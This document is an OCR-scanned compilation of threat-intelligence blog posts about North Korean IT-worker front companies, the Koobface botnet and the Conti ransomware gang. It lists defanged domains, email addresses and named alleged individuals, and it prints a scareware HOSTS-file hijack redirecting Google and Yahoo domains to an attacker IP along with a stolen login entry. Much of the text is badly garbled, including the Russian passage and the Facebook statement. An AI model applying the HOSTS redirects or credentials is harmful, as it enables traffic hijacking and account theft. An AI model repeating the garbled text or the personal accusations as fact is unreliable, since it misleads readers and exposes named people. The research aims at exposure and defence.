28. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVvXsEh-CTkwugRJXof WY 3pmItFié68Xnwnwhv3MXTtVDbBtbRM 
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LAF8CK3uavkFPCGnnt 7F_XIXORn1LvTOVSbNpyfBJCSeOaNI9bJdZ5ki 
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2. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEil89gF7ogqBRTiwwK52TOQCBWUZm7 9UBUItOndeUyS8kI0 
6pWpPoRd043Pf cKWF22F AeAwGuBOHOD34Kq2G5CuHcTy6d11EJWGm6 
3. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjoYHbn59CSVOWGBN4rFx9yzNLamIBLpsST7qRDur1fAOp 
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4. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEic6wf6_t7LJ2w4iF JPS16hTWSBXIBcOIqROexSb26qe8Z 


f£qVyqGZSnMB5e_DsFj1frio-UIx04-U8BvNcmrxD862rzp31ndeQy¢g) 
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OMrPu-kiHinfpqgDR-VQ_cpMa8mCy j jeT-XZiRAYHhh6k8FCVx4e11 
ttps://blogger. googleusercontent .com/img/b/R29VZ2x1/AVvXsEj jko jnUWOKikyhmSR3K35LS8RLj aGK9zVMz_Zil0Vsrs 
geDQDC16vt9zvAq7xLvkn1iWgM1leBSX9-ixBwGrqlog37R1Ny2gIcsS2 
38. 
s59H2To-I2firY6YUo_ylaQpAa4s60R11JQaldgbuoJndp40js6eSkr_ 
ttps://blogger. googleusercontent.com/img/b/R29vVZ2x1/AVvXsEis jnAIVcqkQPdG2D_2zcIPieTPqkM_YMtPITQQp-kj8Lz 
8tOroaAS104j VOGvouHF618kf£MVay1EoVYY JEoO9RtuBJSx00sPkEtCK 
ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEg0aqRJhKJslphqAR1GnYJGOrAy38NrdI0rZAek7L50Gco 
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1. https://blogger.googleusercontent.com/img/b/R29vVZ2x1/AVVXSEiKFhW4NUW9IPP3f AveYCQf upSK3RKa54kBrpkL519kNcC 


60p7 cM8Ef SoWWRLOYEOFxYZAATGLXCHhCsXa9DMMZsEPBdVpiSN9OMKd 
2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgxiwXOvW2qqI j J-4NJ4gSzrJDdZRDSCjnFOVVVEZvfr7 
1twJBmB7zaq75_oBwYYgopbuTQBM70stwiPxLgxYJjKQhNH2Ce JkdCm 


19.10.9 Exposing North Korea’s IT Worker’s Eden Programming Solutions WMD- 
Funding IT Services and Solutions Franchise - An Overview (2023-10-22 20:24) 


[1] 


Jessus. [2]This [3]just [4]in and | think | "did it" and | might even apply fore the Rewards for 
Justice program second time in a row this time believe it or on North Korea’s WMD program 
in terms of tracking down North Korean IT workers that appear to have launched massive 
domain farms and are actively recruiting in the field of developers and IT workers to build 
mobile applications and web sites where the amount at least according to the U.S Government 
goes to fund their WMD program. 


In this analysis which | did in less than two hours time I’ll expose the entire domain portfolio of 
North Korea’s IT workers that are busy franchising across the glove potentially funding North 


28344 


Korea’s WMD program at least according to the U.S Government and will offer in-depth peek 
inside their Internet-connected infrastructure. 


[5] 


THIS DOM/ 


This domain has been seized by the Federal Bureau of Investigation in accordance 
with a seizure warrant issued by the United States District Court for the Eastern District of 
Missouri as part of a law enforcement action against North Korean Information Technology 
(IT) Workers who used it as a software development and portfolio website to advertise and 

obtain remote IT freelancer jobs using fraudulent identities. 


For additional information on North Korea’s use of remote IT workers 
and how to identify them see the following advisories: 


1) Guidance on the DPRK Information Technology Workers — Treasury.gov 


— Enter “North Korean IT Workers Advisory” into any search engine — 
2) Additional Guidance on DPRK IT Workers — PSA at IC3.gov 


>> Report suspicious IT workers to IC3.gov << 


hxxp://edenprogram.com 
eden201621@gmail.com 
eden.company123@gmail.com 
Team 

Alex Banks 

Anastasiia Belenok 

Isaac Hunter 

James Baker 

Mark Rober 

Mason Church 

Tony Stewart 


[6] 
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Alex Banks 
alexbgit80k 


Anastasiia Belenok 


anastas-bel 


Chris B 
chris-bgit 


Eden 
Eden2016 


Isaac Hunter 
ishunter216 


James Baker 
jbaker-git 


Mark Rober 


mark-rober21 


Mason Church 
mehurch21 


Tony Stewart 
tony$2013 


[7] 


[8] 


Follow 


Follow 


Follow 


Follow 


Follow 


Follow 


Follow 


Follow 


Follow 


[9] 
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[10] 
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[11] 
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[12] 
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[13] 
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VIVE LIS FRUIT 


|| 


Michael King Nick Abbate Tony Stewart Claude Roberson Tony Freeman 
Lead Developer Lead iOS & Android Full stack Mobile Full stack web ASP.NET & C# 
Developer Developer developer Expert 
Dmitriy Anisimoy Samuel Agrebi Ricardo Salazar David Nash Pedro Ortega 
Senior mobile Senior mobile & Senior ULUX Cryptocurrency Blockchain Expert 
developer web developer Designer developer 


Stanislav 
Cherneha 


[14] 


64.56. google.ae 


64.56. google.as 
64.56. google. at 
64.56. google.az 
64.56. google.ba 
64.56. google.be 
64.56. google.bg 
64.86. google.bs 
64.86. google.ca 
64.86. google.cd 
64.86. google.com.gh 
64.86. google.com.hk 
64.56. google.com.jm 
64.56. google.com.mx 
64.56. google.com.my 
64.56. google.com.na 
64.56. google.com.nf 
64.56. google.com.ng 
64.56. google.ch 
64.56. google.com.np 
64.56. google.com.pr 
64.56. google.com.qa 
64.56. google.com.sg 
64.56. google.com.tj 
64.56. google.com.tw 
64.56. google. dj 
64.56. google.de 
64.56. google. dk 
64.56. google.dm 
64.56. google.ee 
64.56. google. fi 
64.56. google. fn 
64.56. google. fr 
64.56. google. ge 
64.56. google. gg 
64.56. google.gm 
64.56. google. gr 
64.86. qooqle.ht 


"However, in the case of the Bahama Botnet, this DNS translation method gets corrupted. 
The Bahama botnet malware causes the infected computer to mistranslate a domain name. 
Instead of translating “Google.com” as 74,125.155.99, an infected computer will translate it 
as 64.86.17.56. That number doesn’t represent any computer owned by Google. Instead, it 
represents a computer located in Canada. When a user with an infected machine performs a 
search on what they think is google.com, the query actually goes to the Canadian computer, 
which pulls real search results directly from Google, fiddles with them a bit, and displays them 
to the searcher. 


Now the searcher is looking at a page that looks exactly like the Google search results 
page, but it’s not. A click on the apparently “organic” results will redirect as a paid click 
through several ad networks or parked domains — some complicit, some not. Regardless, 
cost per click (CPC) fees are generated, advertisers pay, and click fraud has occurred." 
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27 May 2022 at 7:30 pm 


© H&TK MxtbopmayvMoHHble CucTemb! & NporpamMupoBaHne 


Bcem gobpuilt seuepea! 

Bot 4 ONATh HaCTaN TOT BeYep, KOr{a NPMLWNa Nopa YATATb O NtO{AX KOTOPbIe HaM 
MHTePecHbl, O KOTOPHIX NPMATHO BCNOMMHaTb. MMeHHO NOsTOMy NpogomKaem 
pyBpuky #BoinycKHMKM Hale CNeyManbHocTH. 

KeTaTH, TOUHO 3HaeM, YTO BbI C HeTePNeHMeM *KeTe HALUMX BEYEPHMX BhINyCKOB! 
Befb MMe@HHO 3THMM TOgbMiM Mb! POpAMMcA WC HeTepneHem Kem BcTpeuu! He 
3afepoKMBaeMCA MW YATAeM Ge... 

1 tak 370 Bbino He O4eHb 4aBHO MW MbI NOMHMM 3TOro YenoBeka. BbinycKHMK 2019 
roga Knonos Aptyp. B rogbl yuebp! ApTyp 6b yuaCTHMKOM ONMMNMag 4 KOHKYPCOB 
NO NPOrPaMMMPOBAaHMIO MW BCera SaLMWan YecTb CNeyMaNnbHOCTU 
#MHPOPMaYMOHHbIe_CHMCTeMBI, 4 BCP HipKeropogc Koro 3KOHOMMKO- 
TeXHONOrMYeckoroe KONNespKa. 

1 Ha cerogHAWwHiit eH xKMBeT B HipkHem Hosropoge. 

YT Yuutcr 6 Hipkeropogckom rocygapCTBeHHOM apxlTeKTYPHO-CTPOMTENbHOM 
YHMBePCHTeTe, CNEUMaNbHOCTh ‘T1porpaMMHar MHOKEHEPHA’, Sa04HO. 

! Kak 6 rogal yuebb! npogomkaerT paboTaTh NporpaMMlCTOM No yaaneHke. 

1 PaGotaet Ha ayTcopce C HECKONbKMMM KOMMaHMAMM, TaKMMI4 Kak: 

- The Ready Games (https: //ready.qq/}; 

- Ready Maker; 

- Eden Programming Solutions (https://edenprogram.corm/}, HO KOMNaHHMA BbICTYNaeT 
NOCPeQHHAKOM, a MpoekTh! Mog NDA; 

- A-Games (https://a-games.fun/}, c KOTOpOM paboTan B nocnegHee BpeMA: ABe Murph! 
Ha MOOMNbHbIe NNAaTpoOpMol. 

! Ssbiku nporpaMMMpoBaHi4A KOTOPbIe ACNonb3yeT B paboTe: OCHOBHOM C# M4 java 
O08 HanvicaHA AarMHoe NA aHApolsa, a objective-c ana mnarMHos Ha ios, Rust. 
Hy HaKOHeY-TO BOCKNMKHeM: Thi kK NPOTPAMMIUCT APTYP Il 


hxxp://github.com/Eden-programming 
hxxp://github.com/tonyS2013 
hxxp://github.com/mchurch21 


hxxp://github.com/mark-rober21 


hxxp://github.com/jbaker-git 


hxxp://github.com/ishunter216 
hxxp://github.com/Eden2016 
hxxp://github.com/chris-bgit 


hxxp://github.com/anastas-bel 


hxxp://github.com/alexbgit80k 


hxxp://dribbble.com/eden _software 


hxxp://www.guru.com/freelancers/eden-programming-solutions 


Team 
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Michael King 


Nick Abbate 


Tony Stewart 


Claude Roberson 


Tony Freeman 


Dmitriy Anisimov 


Samuel Agrebi 


Ricardo Salazar 


David Nash 


Pedro Ortega 


Stanislav Cherneha 


hxxp://www.linkedin.com/in/michael-moore-682a51189 


Sample photos include: 


[15] 


[16] 
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[17] 


[18] 
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Related domains known to have been involved in the campaign include: 
hxxp://kncw.or.kr/ 

hxxp://urbis.com.py/ 

hxxp://www.cijef.com/ 

hxxp://www.mcc-consulting.net/ 

hxxp://www.nanosoft.ae/ 

hxxp://www.nimble-apps.com/ 

hxxp://www.scarletsoftware.com/ 

hxxp://www.seglico.com/ 

hxxp://www.strate.ae/ 


hxxp://www.techsoftco.xyz/ 
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hxxp://www.tekrazor.com/ 
hxxp://www.urbis.com.py/ 
hxxp://www.virtualwarein.com/ 
hxxp://advanzetech.com/ 
hxxp://akubohr.com/ 
hxxp://amsoftwarefactory.com/ 
hxxp://apncoders.com/ 
hxxp://avadhmicrosystem.in/ 
hxxp://bafv.suavilaser.es/ 
hxxp://blis4.co.nz/ 
hxxp://chamados.com.br/ 
hxxp://edenprogram.com/ 
hxxp://finnovion.com/ 
hxxp://ft3.group/ 
hxxp://fts77.ru/ 


hxxp://hasanitsolution.netlify.app/ 


hxxp://informatic.cl/ 
hxxp://letsoft.org/ 
hxxp://manin-hood.com/ 
hxxp://maps.google.com/ 
hxxp://mobicom.io/ 


hxxp://nanosoft.ae/ 


hxxp://opticosenriquehurtado.es/ 


hxxp://palmas.app/ 
hxxp://pbd.co.il/ 
hxxp://ponybelle.com/ 
hxxp://pro-codes.com/ 
hxxp://purpleqube.com/ 
hxxp://rispencerroofing.com/ 
hxxp://springshare.com/ 
hxxp://support.google.com/ 
hxxp://template.wbs-dvp.pro/ 
hxxp://tiiastechsolutions.com/ 
hxxp://to-be-technology.fr/ 


hxxp://translate.google.com/ 
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hxxp://trivamwebsolutions.com/ 
hxxp://tsv.mots.go.th/ 
hxxp://vyzkumne-infrastruktury-test.vm.cesnet.cz/ 
hxxp://www.4dbuilds.co.uk/ 
hxxp://www.advanzetech.com/ 
hxxp://www.asset.org.uk/ 
hxxp://www.calco.dk/ 
hxxp://www.chamados.com.br/ 
hxxp://www.crm-masters. pl/ 
hxxp://www.cybernaptics.mu/ 
hxxp://www.daslos-studios.com/ 
hxxp://www.easypages.url.tw/ 
hxxp://www.emaildoctor.org/ 
hxxp://www.indiamart.com/ 
hxxp://www.informatic.cl/ 
hxxp://www.leoconcept.de/ 
hxxp://www.netsupportsoftware.cl/ 
hxxp://www.olbericsolutions.com/ 
hxxp://www.purpleqube.com/ 
hxxp://www.rfcvela.com/ 
hxxp://www.royalbrokerage.net/ 
hxxp://www.sims.com.br/ 
hxxp://www.toshalinfotech.com/ 
hxxp://www.valueworkx.com/ 
hxxp://www.waynesolutionsinc.com/ 
hxxp://www.zwimbaengineering.com/ 


Related personally identifiable email address accounts known to have been involved in the 
campaign include: 


afahmyl[.]pro-codes.com 
henrique.lambert[.]hotmail.com 
saint5121[.]yahoo.com 
fastbone[.]fastmail.net 
itdoonsolutions[.]gmail.com 
meetchristopher[.]gmail.com 
t.oriol[.]Jsalesclic.com 
asauma[.]tekrazor.com 
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dev[.]nimble-apps.com 
drshmk[.]Jmsn.com 
shuki4tal[.]gmail.com 
t.oriol[.]Jnimble-apps.com 
yoenis.pantoja[.]gmail.com 
a.fahmy[.]windowslive.com 
kncw[.]chol.com 
asauma99[.]yahoo.com 
ubiktime[.]gmail.com 

t _oriol[.]yahoo.fr 
trivamwebsolutions[.]gmail.com 
afahmy[.]lymail.com 
rodrigo.madrid.a[.]gmail.com 
leogar07[.]gmail.com 
caseraghi[.]gmail.com 
Dinesh[.]INDIAMART.COM 
amine.benabou[.]gmail.com 
purplequbess[.]gmail.com 
skiran.pulidindi[.]gmail.com 
info[.]chinacapital.com 
cassio[.]evolua.com.br 


Related personally identifiable email address accounts known to have been involved in the 
campaign include: 


careers[.Jadvanzetech.com 
Global-HR[.Jadvanzetech.com 
contact[.Jadvanzetech.com 
info[.Jakubohr.com 
info[.]Jamsoftwarefactory.com 
pathsoft-support[.]gmail.com 
kottenator[.]gmail.com 
avadhsoft[.]gmail.com 
avadhmicrosystem[.]gmail.com 
support[. ]blis4.co.nz 
suporte[.]chamados.com.br 
hello[.]finnovion.com 
support[. ]finnovion.com 
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info[.]fts77.ru 
ventas[.]informatic.cl 

info[. ]manin-hood.com 
optica[.]opticosenriquehurtado.es 
info[.]ponybelle.com 
a.fahmy[.]windowslive.com 
hello[.]purpleqube.com 
info[.]rlspencerroofing.com 
sales[.]springshare.com 
info[.]springshare.com 
support[.]springshare.com 
asxvmprobertest[.]gmail.com 
info[.]Jinfinitetiias.com 
contact[.]to-be-technology.fr 
info[.]urbis.com.py 
web[.]vyzkumne-infrastruktury.cz 
kontakt[.]calco.dk 
info[.]demolink.org 
mail[.]demolink.org 
cijef[.]cijef.com 
office[.]crm-masters.pl 
info[.]daslos-studios.com 
support[.]emaildoctor.org 
sales[.]Jemaildoctor.org 
info[.]seglico.com 
contacto[.]mcc-cons.com 
contacto[.]mcc-consulting.net 
sales[.]nanosoft.ae 

info[. ]Nanosoftengineers.com 
info[.]nanosoft.sg 

info[. ]midcoKuwait.com 
info[.]facilitazis.com 
enquiry[.]nanosoft.ae 

info[. ]olbericsolutions.com 


info[. ]federacioncanariadevela.org 
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Info[.]royalbrokerage.net 
info[.]scarletsoftware.com 
support[.]scarletsoftware.com 
gabriel[.]Jseglico.com 
contato[.]sims.com.br 
corporate[.]strate.ae 
job[.]strate.ae 
privacy[.]strate.ae 
sales[.]tekrazor.com 
contactus[. ]toshalinfotech.com 
info[.]virtualwarein.com 
contact[.]virtualwarein.com 
customersuccess|[.]waynesolutionsinc.com 
support[. ]}waynesolutionsinc.com 
privacy[.]Jdemolink.org 
duvida[.]chamados.com.br 
comercial[.]chamados.com.br 
problema[.]chamados.com.br 
outros[.]chamados.com.br 
dpo[.]evolua.com.br 
suporte[.]evolua.com.br 
info[.]Jmaninhood.com 
info[.Jinetss.com 
mail[.]demolimk.org 
info[.]Jdemolimk.org 
privacy[.]springshare.com 
jobs[.]springshare.com 


Stay tuned! 


1 

2. ttps://www.justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-reve 
| 

| 

6. 


u Bw 
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7. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgvsh9 j F9OnLb6cWsb64EeM3Ar8Ka5g8dpfrOmxYOZWLD_9gi 

ePFrB6smwebU31X3M316NRn9TqJqDMHBmu4HDJ2d9ITx2NTdQZTMO 

8. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhh0- q1iocUFeONqDWjD5hKzHcf j j1Cx3zV60dg9L_B_Kp40 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEikWVmQDQiIf3gCObeHTRMIP1YQWtmXFN7FYDWrr_mTQn0OPO 
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10. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEhtS-Lv07hRmbj1goVf2t 1asnjpkfagVc81sEj0rER21x 
6jB2wwnHp j udZHZ1Nghki_DoES1UYrE-2v9V-RBhROLryen9Y429wyxz 


11. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEgE_MIdHYy9DKNT1mHHsxQQO0f 2bs15faZaz0n9e_QHCrY! 
KuOES9F oc JmWiZBLY3XZMAYgDF1Z4zoZQwZyumTuiuBNnAtrLis_7NO6 
12. 
9G_Mv6PWrBzV JLaHeLB3HDFRAKJCVT4 jOvg9UrxwikXhvxrST9ExZAOM 
13. 
AdtMi71GYeVv6siq9SRfkGmletf£S jSeHdtVgkht4-Rg8xXFSnCo3ZAIE 
4. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEj jWwP26NOr4ZETRoDqQ4_Ia6cMh11bUM_wowxTHkFPBC 
m/1UYmmYuN3iX_OnJ1vKIjEZwxZSeXnn3t79p4gBCvVkxEEyla0JwV6 
15. 
cqUAFWEQDHp3eF1ZZZcfONP3iMHX0xJ6U16DJD26 j 3mKs80PxZq5EnUp 
16. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhbgB1WkzEZenol19CGGAPwWSeTJAy_JDSW562t£2CYN-k 
O2n18yElc_a5p8hEVr44mzrLXq6buoYx2LYQeUx7 Y6- qHftmULZi3Ez 
17. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVVXsEg6Z_ZrWu2iQ8zZ_Maf jHyhosR8a3aceme1T33UsgYaCZ 
5Fbeq39hTcvhD-Bu3TExu3wROPKdC3xv0KivPmj5m7RKnJv7U_mG- j4 


18. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEg-nmDNBtVdak5ZaDpm-GBCXdd1LFpEatuZ9a6JtWNkLup 


YQnk25Gv0SfWb4_VVE892MwzNDpu2CdyPm09aidurccWz08vs0G5kr- 
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19.11 November 


19.11.1 Where Is Anton Nikolaevich Korotchenko (AHToH Hukonaesuny KopoTtyueHko) 
Also Known as Koobface Botnet Master KrotReal? - Part Two (2023-11-09 01:07) 


[1] 
28362 


The 64.86.17.56 mentioned is actually [57]AS30407 (Velcom), which has also been used in 
[58]recent campaigns. 


text /itre 


Sh=2009-10-06_uavrl.com&ver=1éfr=1&d=803 } text nin 


textihtn 
text /hitn 


y9c064 1 Se60923ac 1538013001411 .35 textijavasc 


image/gif 
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ISP and domain registrars have been notified, action should be taken shortly. What was 
particularly interesting to observe was scareware pushed by the Koobface botnet phon- 
ing back to its well known urodinam .net/8732489273.php domain, was also modifying 
the HOSTS file in the following way. Sample HOSTS modification of scareware (MD5: 
OxOFBF1A9F8E6E305138151440DA58B4F1) pushed by Koobface: 

89.149.210.109 www.google.com 

89.149.210.109 www.google.de 

89.149.210.109 www.google.fr 

89.149.210.109 www.google.co.uk 

89.149.210.109 www.google.com.br 

89.149.210.109 www.google.it 

89.149.210.109 www.google.es 

89.149.210.109 www.google.co.jp 

89.149.210.109 www.google.com.mx 

89.149.210.109 www.google.ca 

89.149.210.109 www.google.com.au 

89.149.210.109 www.google.n! 

89.149.210.109 www.google.co.za 


89.149.210.109 www.google.be 
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Facebook's Continued Fight Against Koobface 


dy Facebook Security on Tuesday, Janwary 17, 2012 a 9:05am 


Tt has almost been a year since we gave you our last update on the Koobface virus. AS er 
more than 3 years and numerocs hours of working cesehy with industry leaders, the securty 
community, and law enforcement. we are pleased to anmounce that Facebook has been free of 
indections fer over 9 months. 


Today, Koobface is still impacting other web properties and continwes to threaten security for 
Internet users across the globe. While we hawe been able to keep Koobtace off Facebook, we 


won't declare victory against the virus urell ts authors are brought to justice. We feel x & the 
facebook imterert of everyone online to work with law enforcement and the larger security community to 
idene#y the garg and see the full force of law broughe to bear against those who have made 


tillicas ip B-gomten gains. To this end, we will be sharing cur intelligence with the rem of the 
online securty community in the coming weeks in an effort to rid the Web of this virus forever. 


| Facebook Security's Notes 

To uphold our comminment to our users and the security of ther data, Facebook takes a very 
aggrestive approach against security threats ranging fom the most annoying social spam to 
malocous viruses and malware. We have been awarded the largest damages ever under the 
CAN-SPAM Act. and we work with the authorities every single day to identity and prosecute 
wrongdoers. While we work diligently on removing these threats from the ste, our Securty 
Team is only truly satisfied when we can remove these threats fom the Web entirely, As part 
of this continued fight against malware and cybercriminals, we wanted to give you an update 
on the Kooblace virus. 


Get Notes vie RSS 


When Koobface fire: surfaced in 2008, our team worked nom-stop ure we were able to cetect 
the virus, remedate affected users. and eventually derefy those parties responsible: we have 
been tacking them ever since. We will be sharing this nvestigaton material as well as 
information on how to best defend against the wirus, with the leeger security communty. This 
will becver enable sites stil targered by Koobface to more adequately protect ther csers. 


Kooblace was able to generate profit through pay-per-click aed traffic referral schemes. After 
installing malware on a user's device, the Koobface gang was able to redirect the user's raffic 
and, in some cases, rick the user inno paying for fake antivirus software. Koobface was able to 
perform these actions by communicating with a central “Command & Control” serves, which 
Grecned the compromised computers to do the gang's bidding. While we were able to stem the 
spread of the virus using a variety of tools (including our URL blacklist and Scan-And-Repar) 
the "Mechership’ was left urecuched. 


This remained the case une! last March, when Facebook Security was able to perform a 
technical takedown of this “Command & Control” Mothership, And since then we have 
had no new sightings of Koobface for ower nine moeths aed our teams are working Aaed to 
keep & that way. 


In addition to ou work behind the scenes, we have built # cumber of tools that have made our 
security protections some of the best on the Web and have spearheaded numerous user 
education campaigns to make sure that everyone knows how to best protect themselves 
ooline. A particular success 5 the Scan-And-Repar tool we built with McAfee to help cu users 
keep ther devices malware-Lee. Also of nove § ou URL blacklist system - 8 core component 
of the Facebook Immune system. This URL blacklist not only proeects users from malicious 
URLs that Facebook discowers. but also protects people bom knowr-bed URLs from all of our 
eczema! partners. 

Nothing is more important to us than ensuring the security and safety of our users and ther 
data, Thankfully, we aren't in this fight alone: cybersecurity is a shared responsiblity for law 
enforcement, industry and everyone who uses the Internet. We will continue to work with the 
broad securty community and industry leaders. such as McAfee and Microsott, We will stay 
fiemby comenined to cur work with law enforcement in stopping these threats and bringing the 
bad guys t© justice. Cybercime involves acd impacts real pecole. anc we praise those in the 
securky community for coming together to expose those who hawe broken the law. We are 
confident that our work in dencifying those responsible will put # sign#cart dent in their ability 
to harm those online and lead to a safer ienernet for all. 


To find out more about Koobface please see the lavest New York Times article or vist the 
Facebook Securty Page. 


Jessus. Just came across this and | decided to elaborate. It’s 2012 and no one is fighting 
[2]Koobface. It’s just me doing research with success at the time. 


If an image is worth a thousand words then check out some of the most recent publicly acces- 
sible photos of Anton Nikolaevich Korotchenko also known as Koobface botnet master KrotReal 
including some sample maps of his latest visits across the globe including possibly the fact 
that he’s visited the United States which is quite a news taking into consideration his online 
activities counting the total number of cities that he has visited internationally up to 65. 


Sample photos include: 
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Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgngXEG5vkeIHZjEIMiqiuL4fnkoZG-3AhScRATitYuW36dh 
k2G18£Qti4JhJ94V8xCTmEAJ1_jPOwvsPJq-SIz52mufPURgvUBy2v 
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. https: //ddanchev.blogspot.com/search/label/Koobface 
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19.11.2 The Conti Ransomware Gang (2023-11-14 19:37) 


eR 


[1] 


28368 


sorte 


An image is worth a thousand words. Video and related images courtesy of the Conti Ran- 


somware Gang is worth more. Go through my original research [2]here and my Conti Ran- 
somware Gang compilation [3]here. 


Sample photos: 
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SecureCall.club 


[17] 


MAIJOR.MS 


[18] 


[19] 


SOFT: GoogleChrome 

HOST: https://www.yahoo.com/login 
USER: RichieRich 

PASS: swagl1337 

UNKN: Default 


Sample videos: 


a 
ee 


 UVOICE@RMPP.JP 
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89.149.210.109 www.google.gr 
89.149.210.109 www.google.at 
89.149.210.109 www.google.se 
89.149.210.109 www.google.ch 
89.149.210.109 www.google.pt 
89.149.210.109 www.google.dk 
89.149.210.109 www.google. fi 
89.149.210.109 www.google.ie 
89.149.210.109 www.google.no 
89.149.210.109 search.yahoo.com 
89.149.210.109 us.search.yahoo.com 


89.149.210.109 uk.search.yahoo.com 


grafityp.info /haBix/11.php7id= 


Sample HOSTS modification of scareware (MD5: OxOFBF1A9F8E6E305138151440DA58B4F1) 
pushed by blackhat SEO: 


74.125.45.100 4-open-davinci.com 

74.125.45.100 securitysoftwarepayments.com 
74.125.45.100 privatesecuredpayments.com 
74.125.45.100 secure.privatesecuredpayments.com 
74.125.45.100 getantivirusplusnow.com 
74.125.45.100 secure-plus-payments.com 


74.125.45.100 www.getantivirusplusnow.com 
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TRUSTED SELLER 
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Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhd0OpFbAmL1NZAA5Y j t2HKRD7 9XdqsDtez0grw6dlKous6s 
X61H2NeFiZ9FHj Aa2eO0qGX JTGUJR6ke5Pt8Z7 YAMWFOBItUp4jite2 

2. https://ddanchev.blogspot .com/search/label/Conti 

3. https://archive.org/details/rewards-for-justice-01 

4. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEg_yVBiuEnYbAE1J6FwY0TOW3MQ3j 89yS-BSM2jLLLumG8qs 
cLvBGvEK_IP2qbpe JvOCau jMywWMcNZH-Tm0H2 jG juWkWOSGD6HxtL 

5. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgTkn7Rax27zL47t-ST90b031zCNLWObgCnpAvwsXo5TGhe2 
IG81_mNTeAejr4nCG596wVpe1JVBVAOJ29FvOOVZnhLprcjvL99L3q 

6. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEiY jnBO7£0SYx-Ktc- d3BG-nCZU6mdVa5QcCEIO81IYYE63uA 
xY_gXL4K-8UMn0s3i2S8D3YOCv8qGSR7 JStHT st VFy ymBM2ye2GL7w 

7. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEhOERWSkUyR1Lz4y5mssAwlKY9R3A0dhG1 ypL7F AaypEBe7 2 
KnzdDyH6_RI6GXt-koNqRJAXwt oNe30GXIaw5TiVszGFI jWQLoqG7v 

8. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEirD-ORoxrrr2TinnxWIsstQuZ-fn9bixXr JUNGb- jOqEDedZ 
VhDimC_9hsFuVuNCdrO0Uv95G3diW6emQCcLtxcAUvbtituf-1T4TNK 

9. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsE jMW9k3u0U6QcFUTeQ8mS5nBBWJ-9hjGdik7v33SYuh5CknK 
7TOO_X_23d1ZWTd0O10HQ3wEOm1FhTj14LJ4h-pMax541-3jF/7BxcmE 

10. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvVXsEjEza65Q0X10UZW5Azg3RqrpVc3uATZOfMNIPniGfySRbu 
ar3Ri0fhHONYWm1oPqiRTdMEfn_1CdYg2K8t-PNbW67nf cwNcoWpyBID 

11. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhikmweRmDDVsAB7Z-f bf hfZpvuLdFD5 j6zWEtCKeQsE-T 
mjBhDqzWAfrKog-f ohHdMLcmZcrnDgDgefnamyAPXVPxVNOwcGpRrKkx9 

12. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEjL7PXsvydfL7aKf6xYvIDP7 2Bq90N8t 7rZrwE3eA6MgoA 
SCzpj 7ROULedmxJcgriL4YctrShVIYyMUEJmv12WFCfUH39TaxmWdDEr 

13. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEjHioBsUNVIibJsapHP Jw_DgY26sUU- j pFU_bEEISI720B 
82gx-BbjVCHikm6QZZvTMrGObCxhKMTRki7 cEFxOsb-DHmgoTRIVy5iv 

14. https://blogger.googleusercontent .com/img/b/R29VZ2x1/AVvXsEhok280rIFEbqXKPSV-k7VYALrG8-TSgtrYQJp16xZm1Er 
3Pym_8IyaW3TJfD8rhGBUgNK JefEj Zh4w60uwM5PmTakOqyKACPAuB8Z 

15. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgtiU_ylpNq5L7eg2wNag9HjHXkVAUC3t dNkj qY5RuQr81 
QMxAki TwNUBkIheCvXIy7tZUhAiVhbz2fAqg3dkK2sMCDI JBqJCXtfBbP 

16. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEjg4L8-1B1qReWMGGOOXnzPKo7q0GP20y7 sr4WGcQEXGlb 


28375 


x0sqiCRrQ_wdzBNUB3DS4kByromRaMCwBTSJ9OX1rqYHOVUxFs7YT- YK 
7. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEjDGGkfmlqI JcP9DPRNyoLrZs2kEEY601_HBXV71It JXzwE 
-D7y-jdy2tvaPnoFLPBIBHcNi_gm- vUMx-gkOMLSOYiTMaPGETOynG 


pay 


H 


px1Qp3Gh6u2LqQEkrBOhGNhhSS192fzZI7FIvhisdJogwZcap67XwOxuM 
9. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhoNIXhc8H2PvBGX51 JMs3aQcBem11z6Xe4MANQOvWdSs 


8. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEiK- qEAQHE8 j 2-uhOAIu8MDR- yrpdk6G4AkM6kt HVhwGb6 
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iINhXixr2nucshjn9GWq2cMz- 39xENgEj XEhYM-u58CFkPInfB2jEwwg 


19.11.3 The Conti Ransomware Gang - Videos - Part Two (2023-11-16 19:53) 


An image is worth a thousand words. Videos courtesy of the [1]Conti Ransomware gang are 
worth [2]more. Check out the following including my Conti Ransomware Gang research compi- 
lation [3]here. 


Sample videos: 
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Stay tuned! 


1. https://ddanchev.blogspot.com/search/label/Conti 
